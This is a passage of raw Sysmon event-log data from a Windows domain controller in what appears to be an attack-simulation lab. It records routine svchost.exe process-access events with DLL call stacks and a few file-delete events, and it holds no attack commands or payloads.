10341000x80000000000000005483Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005482Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005481Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005480Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005479Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005478Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005477Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005476Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005475Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005474Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005473Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005472Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005471Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005470Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005469Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005468Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005467Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005466Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.317{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005465Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.317{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005464Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.301{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\AppReadiness\S-1-5-21-4055678433-3894535204-3898404691-500MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005463Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.301{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27B8D756D42453AB6107C3366E4E643E,SHA256=2D09F745B718B7BF382864FC80F0B3DDBCA5DFFC844C7B767F5F18F819F87BCC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005462Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.270{266CAFBE-64C6-6064-A900-00000000AE01}34042980C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005461Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005460Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005459Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005458Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 